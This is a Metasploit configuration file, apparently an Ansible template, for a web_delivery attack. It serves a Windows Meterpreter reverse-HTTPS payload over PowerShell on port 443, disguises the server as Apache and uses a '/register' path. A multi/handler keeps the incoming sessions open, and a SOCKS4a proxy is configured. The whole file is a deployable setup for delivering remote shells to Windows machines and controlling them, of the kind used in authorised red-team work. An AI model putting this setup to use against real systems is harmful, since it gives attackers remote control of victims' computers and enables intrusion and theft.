[framework/core]
Prompt=%whi%T %blu%H %red%L %grnS:%S %yelJ:%J%whi
ConsoleLogging=true
LogLevel=3
SessionLogging=true
TimestampOutput=true


[framework/ui/console]
ActiveModule=exploit/multi/script/web_delivery

[multi/script/web_delivery]
Payload=windows/meterpreter/reverse_https
VERBOSE=false
EnableContextEncoding=false
DisablePayloadHandler=false
Powershell::persist=false
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=false
Powershell::sub_funcs=false
Powershell::method=reflection
SSL=true
SRVHOST=0.0.0.0
SRVPORT=443
SSLCompression=false
TCP::max_send_size=0
TCP::send_delay=0
HTTP::chunked=false
HTTP::header_folding=false
HTTP::junk_headers=false
HTTP::compression=none
HTTP::server_name=Apache
LPORT=443
LHOST={{ inventory_hostname }}
TARGET=2
EnableStageEncoding=true
URIPATH=/register

[multi/handler]
Payload=windows/meterpreter/reverse_https
LPORT=443
LHOST={{ inventory_hostname }}
EnableStageEncoding=true
ExitOnSession=false

[server/socks4a]
SRVHOST=127.0.0.1
SRVPORT=9050